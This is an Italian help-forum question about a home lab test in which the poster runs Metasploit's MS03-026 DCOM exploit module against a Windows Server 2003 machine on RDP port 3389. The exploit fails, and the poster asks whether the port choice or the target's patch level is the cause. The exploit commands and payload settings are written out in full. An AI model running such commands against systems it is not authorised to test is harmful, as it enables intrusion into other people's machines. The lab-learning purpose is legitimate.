Sto testando su 2 PC come questo:
"vittima": solo Post 3389 aperto, con Windows Server 2003.
Client / Metasploit:
msfconsole > use exploit/windows/dcerpc/ms03_026_dcom
> set RHOST <IP GOES HERE>
> set RPORT 3389
> set PAYLOAD windows/exec
> set CMD whoami
> exploit
Risultato:
Trying target...
Binding to...
Exploit failed: ECONNRESET: an existing connection was forcibly closed by the remote host.
======================================
Dato che il desktop remoto usa già 3389 ma non posso usare altre porte: significa che avrei dovuto aprire una porta sull'altro PC non utilizzato da qualcosa al momento? O solo che l'host non è vulnerabile?